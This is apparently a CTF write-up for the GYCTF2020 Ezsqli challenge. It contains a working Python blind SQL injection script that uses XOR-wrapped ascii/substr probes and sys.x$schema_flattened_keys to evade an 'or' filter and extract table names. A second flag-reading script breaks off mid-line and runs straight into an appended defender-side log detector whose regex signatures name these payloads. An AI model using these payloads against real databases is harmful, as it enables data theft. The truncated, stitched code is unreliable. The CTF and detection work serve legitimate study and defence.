[GYCTF2020]Ezsqli
First, write a script that uses binary search to find the table name. Binary search is fast, but it is easy to get wrong; adding a sleep to slow down the request rate helps. "or" is filtered, so information_schema cannot be used (the word "information" contains "or"); use sys.x$schema_flattened_keys instead.
import requests
import time

url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/"
flag = ""
# 1^(cond)^1 evaluates to cond, so the normal id=1 page (containing "Nu1L")
# comes back exactly when the condition holds.
payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1"

for i in range(1, 100):
    # Lower bound 32: past the end of the string ascii('') is 0, so the search
    # converges to chr(32) == " " and the break below actually fires.
    min_value = 32
    max_value = 130
    mid = (min_value + max_value) // 2
    while min_value < max_value:
        py = payload.format(i, mid)
        data = {"id": py}
        r = requests.post(url=url, data=data)
        if "Nu1L" in r.text:
            min_value = mid + 1   # character is greater than mid
        else:
            max_value = mid       # character is at most mid
        mid = (min_value + max_value) // 2
    if chr(mid) == " ":
        break
    flag += chr(mid)
    print(flag)
    time.sleep(0.5)  # slow down so requests are not dropped or mis-ordered
The table name turned out to be f1ag_1s_h3r3_hhhhh, but with information_schema filtered we cannot enumerate the column names the way we did before. Since we know the table name, though, we can read the table contents by comparing strings through ASCII offsets. (select 1,"{}") is used because the flag is in the second column of f1ag_1s_h3r3_hhhhh, which can be worked out by trying (select 1,1) and (select 1,1,1).
Again add a sleep so that requests are not sent too fast and fail.
import requests
import time

url = 'http://67e56c51-dad1-4cd9-b205-91d106ccf701.node4.buuoj.cn:81/'

def add(flag):
    res = ''
    res += flag
    return res

flag = ''
for i in range(1,
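As an added example from the defender's side (not part of the original writeup): a small Python detector that flags the kind of probing these scripts generate in an application log. It keys on the technique (ascii/substr character probes, sys.x$ or information_schema enumeration, the XOR wrapper, tuple comparisons) rather than on one keyword such as "or", and records the numeric thresholds per source so the binary search becomes visible. The log format and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the challenge): "<client-ip> id=<raw id parameter>".
SAMPLE_LOG = """\
10.0.0.5 id=1
10.0.0.5 id=2
10.0.0.9 id=1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),1,1))>81)^1
10.0.0.9 id=1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),1,1))>105)^1
10.0.0.9 id=1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),1,1))>93)^1
10.0.0.9 id=1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),1,1))>99)^1
10.0.0.7 id=3
"""

# Match the technique, not one keyword: a blocklist on "or" stops
# information_schema but not sys.x$schema_flattened_keys.
SIGNATURES = {
    "char_probe": re.compile(r"ascii\s*\(\s*substr", re.I),
    "schema_enum": re.compile(r"\b(information_schema|sys\.x\$\w+)", re.I),
    "bool_xor": re.compile(r"\^\s*\(.*\)\s*\^"),
    "tuple_cmp": re.compile(r"\(\s*select\s+1\s*,", re.I),
}
THRESHOLD_RE = re.compile(r">\s*(\d+)\s*\)")
LINE_RE = re.compile(r"^(\S+)\s+id=(.*)$")

def classify(id_value):
    """Names of the signatures that fire on one raw id parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(id_value))

def analyze(log_text, min_hits=3):
    """Per-source summary of flagged requests; only sources with at least
    min_hits flagged requests are returned (thresholds show the search path)."""
    per_ip = defaultdict(lambda: {"hits": 0, "signatures": set(), "thresholds": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, value = m.groups()
        tags = classify(value)
        if not tags:
            continue  # ordinary request, nothing to record
        entry = per_ip[ip]
        entry["hits"] += 1
        entry["signatures"].update(tags)
        t = THRESHOLD_RE.search(value)
        if t:
            entry["thresholds"].append(int(t.group(1)))
    return {ip: e for ip, e in per_ip.items() if e["hits"] >= min_hits}
```

On the sample, analyze(SAMPLE_LOG) reports only 10.0.0.9, with thresholds 81, 105, 93, 99 narrowing in on one character.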